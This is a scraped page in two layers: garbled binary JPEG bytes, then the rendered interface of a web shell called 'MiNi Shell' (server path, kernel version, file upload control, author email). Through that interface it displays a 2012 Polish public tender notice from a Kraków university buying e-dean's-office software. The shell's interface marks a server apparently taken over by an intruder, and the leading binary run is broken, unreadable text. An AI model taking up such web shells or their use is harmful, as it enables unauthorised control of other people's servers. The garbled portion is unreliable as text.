JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121127/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121127/475606-N-2012.html

<p class="kh_header"><b>Kraków: Dostawa oprogramowania do  wymiany informacji i współpracy Uczelnia-pracodawcy (aplikacja współpracująca z systemem e-dziekanatowym/platforma internetowa) 
oraz dostawa oprogramowania do realizacji ankiet ewaluacyjnych dot. nauczycieli akademickich współpracującego z systemem e-dziekanatowym, wdrożenie i szkolenia.</b><br>
<b>Numer ogłoszenia: 475606 - 2012; data zamieszczenia: 27.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Papieski Jana Pawła II w Krakowie , ul. Kanonicza 25, 31-002 Kraków, woj. małopolskie, tel. 12 421 68 48, faks 12 421 68 48 wew. 24.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.upjp2.edu.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Niepubliczne uczelnie katolickie finansowane na zasadach uczelni publicznych..</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa oprogramowania do  wymiany informacji i współpracy Uczelnia-pracodawcy (aplikacja współpracująca z systemem e-dziekanatowym/platforma internetowa) 
oraz dostawa oprogramowania do realizacji ankiet ewaluacyjnych dot. nauczycieli akademickich współpracującego z systemem e-dziekanatowym, wdrożenie i szkolenia..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zadania w zakresie Dostawa oprogramowania do  wymiany informacji i współpracy Uczelnia-pracodawcy (aplikacja współpracująca z systemem e-dziekanatowym/platforma internet.) oraz dostawa oprogramowania do realizacji ankiet ewaluacyjnych dot. naucz. akad. współpracującego z syst. e-dziekanatowym, wdrożenie i szkolenia. 
Uczelnia korzysta obecnie z systemu ProAkademia 400.

Zamawiający dopuszcza składanie ofert częściowych, tj. na 2  ZADANIA. Wykonawca może sobie wybrać jedno lub dwa  ZADANIA  i na nie złożyć ofertę..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 48.50.00.00-8, 72.26.30.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>.   Wypełniony formularz  OFERTY  
2.   Formularz cenowy  stanowiący Rozdział IV niniejszej siwz 
3.  Stosowne  Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty nie 
      wynika   bezpośrednio ze złożonego w ofercie odpisu z właściwego rejestru. Pełnomocnictwo/a 
      ma być złożone w formie oryginału lub kopii poświadczonej  przez notariusza.
4.  W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument
     ustanawiający Pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie  
     zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego 
     zamówienia  publicznego. 
5. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych
    do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od 
    charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany
    jest udowodnić Zamawiającemu, ze będzie dysponował zasobami niezbędnymi do realizacji
    zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów
    do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy 
    wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Warunki zmiany, przedmiotu zamówienia lub umówionego terminu wykonania zadania, jakie w umowie dopuszcza Zamawiający:
a) w zakresie przedmiotu i terminów wykonania:
-  w zakresie zmiany terminu realizacji - jeżeli  wykonanie będzie niemożliwe np. z uwagi na czas trwania procedury przetargowej 
- z powodu wystąpienia dodatkowych, a niemożliwych do przewidzenia przed zawarciem umowy przez doświadczonego wykonawcę, dostaw
- z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć z pewnością, w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w znacznych rozmiarach;
- z powodu działań osób trzecich uniemożliwiających wykonanie dostaw, które to działania nie są konsekwencją winy którejkolwiek ze stron.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.upjp2.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Papieski Jana Pawła II, ul Kanonicza 25, 31-002 Kraków, Biuro Zamówień Publicznych (parter).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.12.2012 godzina 09:30, miejsce: Uniwersytet Papieski Jana Pawła II, ul Kanonicza 25, 31-002 Kraków, Biuro Zamówień Publicznych (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Umowa jest objęta Projektem Współfinansowanym przez Unię Europejską w ramach Europejskiego Funduszu Społecznego Poddziałanie 4.1.1 Wzmocnienie potencjał dydaktycznego uczelni. Projekt pt. Efektywność zarządzania i jakość kształcenia miarą sukcesu  w UPJPII. Umowa została  zawarta w ramach Projektu pt. Efektywność zarządzania i jakość kształcenia miarą sukcesu w UPJPII w ramach Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków    Europejskiego Funduszu Społecznego w ramach Poddziałania 4.1.1 PO KL, nr umowy: UDA-POKL-04.01.01-00-038/11-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ZADANIE I -  Oprogramowanie do wymiany informacji i współpracy Uczelnia-pracodawcy (aplikacja współpracująca z systemem e-dziekanatowym/platforma internetowa).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa oprogramowania do wymiany informacji i współpracy Uczelnia-pracodawcy (aplikacja współpracująca z systemem e-dziekanatowym/platforma internetowa posiadanym przez Uczelnię).
Wymagania ogólne dotyczące oprogramowania do wymiany informacji i współpracy Uczelnia-pracodawcy
Wymagania ogólne
System musi umożliwiać realizację dostępu poprzez różnorodne metody: dostęp poprzez dedykowaną aplikację kliencką, dostęp terminalowy, dostęp poprzez przeglądarkę WWW.
System musi posiadać specjalizowany moduł administracyjny do zarządzania parametrami globalnymi, użytkownikami, prawami dostępu. 
System musi umożliwiać tworzenie użytkowników o zróżnicowanych uprawnieniach. Dla każdego z użytkowników system musi umożliwiać ścisłe zdefiniowane uprawnień (np. w ramach  uprawnienia muszą być ograniczone do własnych, dedykowanych dla niego danych. Zakres uprawnień powinien dopuszczać kombinacje ze zbioru: podgląd, modyfikacja.
Komunikacja z użytkownikiem musi odbywać się w języku polskim.
Aplikacja musi być kompatybilna z systemem ProAkademia 400 posiadanym przez Uczelnię
Szata graficzna, interfejs oraz użyteczność oprogramowania muszą być kompatybilne z istniejącymi w systemie ProAkademia 400
Posiadanie bezpośredniej komunikacji ze studentami i kadrą poprzez automatycznie generowane e-maile, SMS-y.
Tryb pracy wielozakładowej (jedna instancja systemu i bazy danych musi pozwalać na jednoczesną obsługę wielu różnych podmiotów (uczelnie, szkoły, itd.).
Obsługę studiów prowadzonych na wszystkich poziomach (stacjonarne, niestacjonarne, podyplomowe oraz kursy) prowadzonych w systemie tradycyjnym.
System musi pracować  w  środowisku  lokalnej  sieci  komputerowej,  zapewniając  dostęp  użytkowników  administracyjnych poprzez ich stacje robocze do danych umieszczonych w bazie na specjalnie  wydzielonym serwerze bazy danych
Aplikacje systemu muszą pracować w technologii klient - serwer tzn. moduł uruchomiony na stacji roboczej odpowiada za kontakt z użytkownikiem, częściowe przetworzenie danych i przekazanie ich do serwera, jak również prezentację danych, natomiast serwer bazy danych odpowiada za i świadczenie usług na rzecz klienta (przechowywanie i przetwarzanie danych).
Serwer bazodanowy powinien być udostępniany na jednej z licencji typu OpenSource (GPL, IPL itp.)
Architektura tworzenia dynamicznych stron www: ASP .NET lub równoważna
System powinien być napisany z użyciem wydajnego interfejsu z wbudowanymi mechanizmami zabezpieczeń przed włamaniami/ atakami z zewnątrz, przy czym  preferowany ASP.NET MCV lub równoważne
System powinien być zainstalowany na serwerze udostępnionym przez Zamawiającego, opisanym poniżej:
Windows Server 2008 R2 Enterprise
Dell R710
2x Intel Xeon X5660  2.8GHz
32 GB Ram
2x300GB Main System
4x1TB Wirtualki
1x1TB Hot-Swap
1x1TB Zapasowy.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.50.00.00-8, 72.26.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> ZADANIE II - Oprogramowanie do realizacji ankiet ewaluacyjnych dotyczących nauczycieli akademickich współpracującego z systemem e-dziekanatowym, wdrożenie i szkolenia.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa oprogramowania do realizacji ankiet ewaluacyjnych dotyczących nauczycieli akademickich współpracującego z systemem e-dziekanatowym, wdrożenie oprogramowania i szkolenia dla użytkowników.
Wymagania ogólne dotyczące oprogramowania do realizacji ankiet ewaluacyjnych dotyczących nauczycieli akademickich współpracującego z systemem e-dziekanatowym
Opis wymagania
System musi umożliwiać realizację dostępu poprzez różnorodne metody: dostęp poprzez dedykowaną aplikację kliencką, dostęp terminalowy, dostęp poprzez przeglądarkę WWW.
System musi posiadać specjalizowany moduł administracyjny do zarządzania parametrami globalnymi, użytkownikami, prawami dostępu. 
System musi umożliwiać tworzenie użytkowników o zróżnicowanych uprawnieniach. Dla każdego z użytkowników system musi umożliwiać ścisłe zdefiniowane uprawnień (np. w ramach  uprawnienia muszą być ograniczone do własnych danych - np. student winien widzieć tylko swoje dane, nauczyciel tylko dane swoich studentów, pracownik dziekanatu tylko studentów swojego wydziału). Zakres uprawnień powinien dopuszczać kombinacje ze zbioru: podgląd, modyfikacja.
Komunikacja z użytkownikiem musi odbywać się w języku polskim.
System musi pracować  w  środowisku  lokalnej  sieci  komputerowej,  zapewniając  dostęp  użytkowników  administracyjnych poprzez ich stacje robocze do danych umieszczonych w bazie na specjalnie  wydzielonym serwerze bazy danych
Aplikacje systemu muszą pracować w technologii klient - serwer tzn. moduł uruchomiony na stacji roboczej odpowiada za kontakt z użytkownikiem, częściowe przetworzenie danych i przekazanie ich do serwera, jak również prezentację danych, natomiast serwer bazy danych odpowiada za i świadczenie usług na rzecz klienta (przechowywanie i przetwarzanie danych).
Serwer bazodanowy powinien być udostępniany na jednej z licencji typu OpenSource (GPL, IPL itp.)
Architektura tworzenia dynamicznych stron www: ASP .NET lub równoważna
System powinien być napisany z użyciem wydajnego interfejsu z wbudowanymi mechanizmami zabezpieczeń przed włamaniami/ atakami z zewnątrz, przy czym  preferowany ASP.NET MCV lub równoważne
System powinien być zainstalowany na serwerze udostępnionym przez Zamawiającego, opisanym poniżej:
Windows Server 2008 R2 Enterprise
Dell R710
2x Intel Xeon X5660 @ 2.8GHz
32 GB Ram
2x300GB Main System
4x1TB Wirtualki
1x1TB Hot-Swap
1x1TB Zapasowy

System musi być zintegrowany z systemem ProAkademia, systemem Wirtualny Dziekanat v. 4.0 firmy APR System
Szata graficzna, interfejs oraz użyteczność oprogramowania muszą być kompatybilne z istniejącymi w systemie ProAkademia 400

System powinien posiadać:
Opis wymagania
Posiadanie bezpośredniej komunikacji ze studentami i kadrą poprzez automatycznie generowane e-maile, SMS-y (np.: informacja o zmianie planu zajęć dla konkretnej grupy, przypomnienie o zaległościach płatniczych, itp.).

Tryb pracy wielozakładowej (jedna instancja systemu i bazy danych musi pozwalać na jednoczesną obsługę wielu różnych podmiotów (uczelnie, szkoły, itd.).
Obsługę studiów prowadzonych na wszystkich poziomach (stacjonarne, niestacjonarne, podyplomowe oraz kursy) prowadzonych w systemie tradycyjnym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 48.50.00.00-8, 72.26.30.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com